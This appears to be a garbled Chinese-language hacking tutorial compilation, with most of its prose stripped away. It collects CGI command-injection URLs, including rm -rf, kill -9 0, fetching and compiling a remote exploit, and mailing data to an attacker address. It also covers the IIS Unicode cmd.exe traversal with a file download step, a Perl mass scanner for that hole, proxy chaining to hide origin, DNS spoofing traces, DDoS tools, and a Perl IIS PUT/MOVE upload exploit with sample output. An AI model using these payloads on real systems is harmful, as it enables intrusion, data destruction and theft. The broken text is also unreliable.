http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20'lame'
cat
grep
lame'
(5)';'
unix
Example:
# id;uname -a
id
uname
web IDS
web IDS
(6'<' '>'
Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd motd
)
web
RDS exploit web
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
html
web
16
7'!'
Example:
http://host1/something.php=
host2
host1
16
web
Example:
http://host/something.php=
id' web
id
nobody'www'
Example:
http://host/something.php=
.htpasswd ,Apache
.ht SSI
8 ' web PHP
php
Example: http://host/something.php=
php web
9'`'
perl web
Example:
http://host/something.cgi=`id`
perl
cgi id
,,
,.,
'/bin/ls'
web
web
cgi,asp,php...etc)
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
'cmd.exe'
windows shell,
windows
80
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
'/bin/id'
2
/bin/ls
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
'/bin/rm'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
'wget and tftp'
wget unix
tftp unix nt
IIS tftp
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
'cat'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd|
http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
'echo'
index.html
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt|
http://host/cgi-bin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt;
'ps'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux|
http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
'kill and killall'
unix
exploit
Examples:
http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
'uname'
web
isp
uname
-a
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a|
http://host/cgi-bin/bad.cgi?doh=uname%20-a;
'cc, gcc, perl, python, etc...' /
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
perl python
perl ,python
'mail'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail
%20attacker@****cnhonker.org%20<
20
sniffer
sniffers()
internet .
.
2
1 sniffer 2 sniffer
sniffer
, ,
. "" ,
,. sniffer
,
.
lan/wan
sniffers
.
sniffers,
, .
sniffers
sniffers Sniffer Pro
snoop UNIX
GOOGLE BAIDU www.yahoo.com
sniffer
, sniffer .
, sniffers.
(
),
.""
,
sniffer
.
"".
, .Sniffer
,
.
AntiSniff
()
http://www.pdasky.com.cn/down.asp?id=2876&no=1
21
?
.
mac
tcp/ip
ip .
*tcp/ip
OSI TCP/IP OSI 7
tcp/ip 5
()
HUB (
) HUB
HUB mac
promiscuous
promiscuous
,
1
,
2
dns
dns DNS
ping
, COPY , ,:
00:30:6E:00:9B:B9, ip
192.168.1.1, icmp
00:30:6E:00:9B:9B, 192.168.1.1
ip ip ping
arp
,arp icmp ,
arp
arp
Windows
Windump http://www.xfocus.net/tools/200108/238.html
http://security.zz.ha.cn/windump.html
NT
98 98
ME NT
UNIX
Sniffit http://www.programsalon.com/download.asp?type_id=53 6
http://www.xfocus.net/articles/200001/28.html
22
IIS5 UNICODE
2
unicode
,,
,administrator !
10 ,
.
()unicode
,,
!
UNICODE BUG UNICODE
%c1%1c - (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
NT4 /%c1%9c . :WIN2000 %c0%af
UNICODE "/""\""../",
unicode
ip
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
c .
()unicode
IUSR_machinename
Everyone Users Web
!
()unicode
1
!
, IE http://ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
c
., dir+c:\ set ,
PATH_TRANSLATED=c:\inetpub\wwwroot (
).
c:\inetpub\wwwroot !
,
CMD.EXE
c:\inetpub\scripts ,
,echo
:,,
?
( gale),
cmd.exe
c:\inetpub\scripts , gale.exe gale ( q:)
q:
.
,
,,
, ?
:
echo
ip/scripts/gale.exe?/c+echo+open+ ip>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+get+index.htm>>.txt
ip/gale.exe?/c+echo+bye>>.txt
ip/gale.exe?/c+ftp+-s:.txt
copy
()unicode
, ,
unicode
perl
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later...h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=<STDIN>);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while (<IN>)
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
$url $url2
:
winnt
"http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"
url ""
perl
, winnt/2000
?,
:
cmd.exe
cmd.exe *
winnt/win2000
,
web
C:\InetPub\wwwroot c:\inetpub
scripts
web
e:\netroot C:\inetpub
., unicode , web
d , d , QQ :"!
,
!~~",!, ,(:
,
, !).
internet ,
, web
,.
, web
80 108
unicode
, ip
, (:
,.
.)
3
iusr_server
UNICODE
iusr_server
iusr_server
guest
iusr_server
NTFS web
iusr_server
iusr_server web
4
.
,, unicode , web
,"cmd.exe"
,:
admin
unicode ,
,.,(:
:admin :1234),.,*
, . 8 ,
,:g&A$l#e7 ,,
,
,,.
,
,
,()
23
log
:)log IP IP
.QQ ICQ
.ftp
.mail
.telnet
.
.(
IRC
wingates proxies
windows sock
.
wingate
wingates
1080 socks
wingatescan
http://www.cyberarmy.com/lists/wingate
. wingate
.
purpose
http://www.buffy.nu/article.php3?id_article=3043
socks server : 127.0.0.1 port 8000.
'socks version 5'.'resolve all names remotely'.
'supported authentication'
new socks
.
socks chainer
http://www.ufasoft.com/socks
service , new name Chainport 8000
new
wingates IP
1080
http://cavency.virtualave.net/cgi-bin/env.cgi
http://internet.junkbuster.com/cgi-bin/show-http-headers
telnet
telnet
ftp.cztc.edu.cn
https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py
SSL
FTP ftp.zedz.net FTP
IP
chain IP
SkSockServerSSS
wingate
1/ Sock SSS
255
2/ Sock SSS
..
webmaster
sock
webmaster sniffer
SSS
3/ sock SSS
ok
sock Tcp Udp
SSS
COPY
A SSS
SSS
SSS
-install NT SSS
-remove SSS.
-debug snake debug
sksockserver install
sksockserver
net start skserver skserver A
Ok A
B
B IE SSS~~2IP
B sockservercfg
vc sockservercfg, mfc
XXXX mfc42.dll
B X:\winnt\system32
sockservercfg 3 4 5
3SSS
5SSS IP A Ip
bActive
bActive Snake!!!
Too too lazy! Add.
ok SocksCap
http://www.youngzsoft.com/cn/sockscap/
SocksCap Sock IP A , SocksCap
telnet,ftp,ntshell,IE
:
C,D,E.....
n A 3389
SSS
24
2003
()
http://main.huigezi.com/main.asp
http://main.huigezi.com/main.asp
IP (
)
P_Client.exe (
)
Server.exe (
!)
(P_Client.exe)
!
!
1. !
IP !
!
!
!.126.com
!
E-Mail !(
!)
!!
!
!
!
!
Server.exe
()
!!
! !
!
2003
2003
XP
IPC
SUPERSCAN
IE
25
DNS
bind
)
1>.DNS
DNS , DNS
,,DNS
:
unix Internet
, rlogin , IP 123.45.67.89,
DNS (/etc/resolv.conf
DNS ) IP 98.76.54.32,(IP
38.222.74.2) unix
rlogin
, unix
/etc/hosts.equiv
dns , unix
IP 98.76.54.32 DNS
PTR :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
IP 98.76.54.32 DNS ,,
DNS 38.222.74.2 38.222.74.10 74.222.38.in-addr.arpa. DNS
, 38.222.74.2 PTR :
98.76.54.32 -> 38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
,38.222.74.2 IP, .
DNS ,:
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
98.76.54.32 DNS ,
123.45.67.98, rlogin unix
( :) ), 98.76.54.32
DNS .
unix
IP 38.222.74.2
trusted.host.com, unix
/etc/hosts.equiv , rlogin ,,
.
unix ,,PTR ,PTR
A , IP :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A
, 98.76.54.32 DNS ,
2.74.222.38.in-addr.arpa
38.222.74.2 trusted.host.com ,
IP : Internet DNS , ,
DNS ,
.
2>. Denial of service
, 38.222.74.2 ,
98.76.54.32 DNS 2.74.222.38.in-addr.arpa ,:
74.222.38.in-addr.arpa ,
.
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
,98.76.54.32 DNS
www.company.com ,
IP !
3>. Theft of services
,:
38.222.74.2 -> 98.76.54.32 [Answer]
,.
, ., 98.76.54.32
DNS www.company.com CNAME ,
www.competitor.com .,, A , DNS
.(,
loading balance ?)
,DNS
,
DNS
"".
:
A can add
NS can add
MX can add
PTR cannot add
windows98
windows,NT(service
pack 3 )linuxSolaris Mac OS
ping of
death ICMP
teardrop
TCP/IP IP
IP
TCP/IPservice
pack 4 NT
UDP
Echo
TCP/IP
Internet UDP
SYN SYN flood
DDOS
TCP/IP ACK
SYN
SYN
Land
Land SYN
SYN-ACK
ACK
Land UNIX
NT
smurf
ICMP ping
ICMP
ping
of death Smurf
ICMP
Fraggle
Fraggle Smurf UDP
ICMP
UDP
NetBIOSTelnet NFS
NFSNetBIOS Telnet
netcatVNCpcAnywhere
TCP
strcpy(),strcat()
SafeLibtripwire
ping
ICMP
TCP
host
unreachable
RESET SYN-ACK DNS
NAT
host unreachableICMP
10
NT Solaris TCP/IP
Banner
DNS
DNS
DNS
IP
Finger
finger finger
finger IP
LDAP
LDAP
LDAP
LDAP LDAP DMZ
4
DNS
DNS
DNS
DNS DNS
SMTP
PGP
:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699
26
DDOS
DDOS
http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698
1------ ping ping of death teardrop UDP
UDP flood
SYN SYN flood--
DDOS
Land Smurf Fraggle
2
3
4
DDOS
DDOS
DDOS
Internet
DoS
DoS
DoS 1
1 DoS
DDoS DoS
DoS
CPU
DoS
-
""
3,000 10,000
DDoS DoS
10
10
100
DDoS
DDoS
G 2.5G
DDoS
TCP
, DDoS 2 3
4
DDoS
3 2
2 3
DDoS
"
" DDoS
,
1.
2.
DDoS
"
" DDoS
DDoS
1.
DDoS
http://www.WWWW.com
www yahoo http://www.WWW.com
DDoS 66.218.71.87
www
http://www.WWW.com IP
IP
IP
DDoS
DDoS
2 5
DDoS
*
2.
DDoS
DDoS DDoS
cgiUnicodeftp
()
DDoS
ftp DDoS
3.
2
"
~ ~!"
DDoS
""
ping
SYN Flood
SYN-Flood DDoS
DoS
SYN-Flood
SYN-Flood
Syn Flood -
Syn Flood
TCP/IP
TCP (ACK )
ISN(ACK )
TCP
Syn Flood
SYN
SYN+ACK ACK
SYN+ACK
SYN
Timeout 30 -2
1
----
CPU
IP SYN+ACK
TCP/IP
---
TCP
1Trinoo
Trinoo 4 UDP
IP
27665/TCP
27444/UDP
31335/UDP
2TFN
TFN
SYN Ping UDP SMURF
3TFN2K
TFN2K TFN TFN TFN2K
TFN ICMP Mix Targa3
TFN2K
4Stacheldraht
Stacheldraht TFN
TFN
RFC2267
Stacheldraht
DDoS
DDoS
1
ICP UDP
2DDoS
DDoS
DDoS
DDoS
DDoS
ISPICP
WWW
DDoS
DoS
Syn
Syn time out
DDoS
SYN
IP
DDoS
.
Cisco
CEF Unicast
IOS
Cisco startup config running
config running config
startup config
copy start run
ISP / ICP
ISP / ICP
DDoS
""
- DDoS ISP
ISP
ISP
ISP
27
iis
IIS iis
iis IIS iis
web telnet
web
(80)
web
%^#$!~
URL URL
URL
Host
HTTP
Content-Length
nctelnet perl
binmode()
#!/usr/bin/perl
use IO::Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; #
print "$file size is $size bytes\n";
while (read(FILE,$char,1024)) { #
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; #
}
else{
print "upfile faile!!!\n\n";
print @req;#
}
close $sock;
close FILE;
C:\usr\bin>perl.exe
iiswt.pl
/Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!
127.0.0.1
80
kaka.txt
C:\Inetpub\Scripts>dir kaka.txt
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:37 14 kaka.txt
1 14
0 3,871,080,448
binmode()
2 exe
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
80
perl.exe
/Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:42 20,535 perl.exe
1 20,535
0 3,871,031,296
exe asp
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
/Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
80
kaka.asp
post
asp
iis
HTTP/1.1 403 Forbidden
iis iis
putpostget
COPY, MOVE
asp web txt
copymove asp
nc
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
MOVE /scripts/kaka.txt /scripts/kaka.asp
put move iis :)perl
asp
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by SuperHei && lanker
************************************************************
}
else{
print "upfile faile!!!";
}
close $sock;
28
1[system Idle Process]
: Windows
cpu CPU
CPU
2[alg.exe]
: alg or alg.exe
:
:
Internet Internet
3[csrss.exe]
: csrss or csrss.exe
: Client/Server Runtime Server Subsystem
:
Windows
: Win32 csrss /
csrss
Windows 16 MSDOS
4[ddhelp.exe]
: ddhelp or ddhelp.exe
: DirectDraw Helper
: DirectDraw Helper DirectX
Directx
5[dllhost.exe]
: dllhost or dllhost.exe
: DCOM DLL Host
: explorer or explorer.exe
:
: Windows Program Manager Windows Explorer
Windows
Shell
shell
windows
c d
explorer.exe
7[inetinfo.exe]
: inetinfo or inetinfo.exe
: IIS Admin Service Helper
: InetInfo Microsoft Internet Information Services (IIS)
Debug
IIS
inetinfo.exe
8[internat.exe]
: internat or internat.exe
: Input Locales
:
internat.exe
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload
internat.exe EN
EN
internat.exe internat
9[kernel32.dll]
: kernel32 or kernel32.dll
: Windows
: Windows
Kernel32
10[lsass.exe]
: lsass or lsass.exe
:
: Windows
IP
ISAKMP/Oakley (IKE) IP
winlogon
msgina.dll
lsass
shell windows
LDAP 3
1000 "AND"
Lsass.exe
30
11[mdm.exe]
: mdm or mdm.exe
: Machine Debug Manager
: Debug Microsoft Office
Microsoft
Script Editor
Mdm.exe (Debug)
fff 0 mdm.exe
fff CHK
?X
Mdm.exe
fff Mdm.exe
fff Ctrl+Alt+Del
Mdm Mdm.exe Mdm.exe(
C:\Windows\System ) Mdm.bak msconfig
Machine Debug Manager Mdm.exe
msconfig IE
5.X (Internet
) fff
12[mmtask.tsk]
: mmtask or mmtask.tsk
:
: Windows MIDI
13[mprexe.exe]
: mprexe or mprexe.exe
: Windows
: Windows
Windows 32
A-311 (Trojan.A-311.104)
mprexe.exe
14[msgsrv32.exe]
: msgsrv32 or msgsrv32.exe
: Windows
: Windows Windows
msgsrv32.exe win9x
msgsrv32.exe
15[mstask.exe]
: mstask or mstask.exe
: Windows
: Windows
win9X
16[regsvc.exe]
: regsvc or regsvc.exe
:
17[rpcss.exe]
: rpcss or rpcss.exe
: RPC Portmapper
: Windows RPC
RPC
()
98
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"
"
"C:\WINDOWS\SYSTEM\RPCSS"
18[services.exe]
: services or services.exe
: Windows Service Controller
: Windows
%systemroot%\system32\services.exe
19[smss.exe]
: smss or smss.exe
: Session Manager Subsystem
: MS-DOS
LPT1 COM Win32
Windows
WinlogonWin32Csrss.exe
Winlogon Csrss
smss.exe
20[snmp.exe]
: snmp or snmp.exe
: Microsoft SNMP Agent
: Windows SNMP
SNMP WinsockAPI
21[spool32.exe]
: spool32 or spool32.exe
: Printer Spooler
: Windows
22[spoolsv.exe]
: spoolsv or spoolsv.exe
: Printer Spooler Service
: Windows
spooler
23[stisvc.exe]
: stisvc or stisvc.exe
: Still Image Service
: Still Image Service
Windows
24[svchost.exe]
: svchost or svchost.exe
: Service Host Process
: Service Host Process .
Svchost.exe
Svhost.exe %systemroot%\system32
Svchost.exe
Svchost.exe
Svchost.exe
Svchost.exe
windows 2k 2 svchost
4
svchost.exe
25[taskmon.exe]
: taskmon or taskmon.exe
: Windows Task Optimizer
: windows
26[tcpsvcs.exe]
: tcpsvcs or tcpsvcs.exe
: TCP/IP Services
: TCP/IP Services Application TCP/IP Internet
27[winlogon.exe]
: winlogon or winlogon.exe
: Windows Logon Process
: Windows NT
winlogon CTRL+ALT+DEL
28[winmgmt.exe]
: winmgmt or winmgmt.exe
WMI
WinMgmt.exe Windows 2k/NT Windows
95/98 exe Windows 2k
WMI
Windows 2k SP2
29[system]
: system or system
: Windows System Process
: Microsoft Windows
Windows2k/XP
smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe (
msgsrv32.exe, mprexe.exe, mmtask.tsk, kernel32.dll
29
(1997 12 11 1997 12 30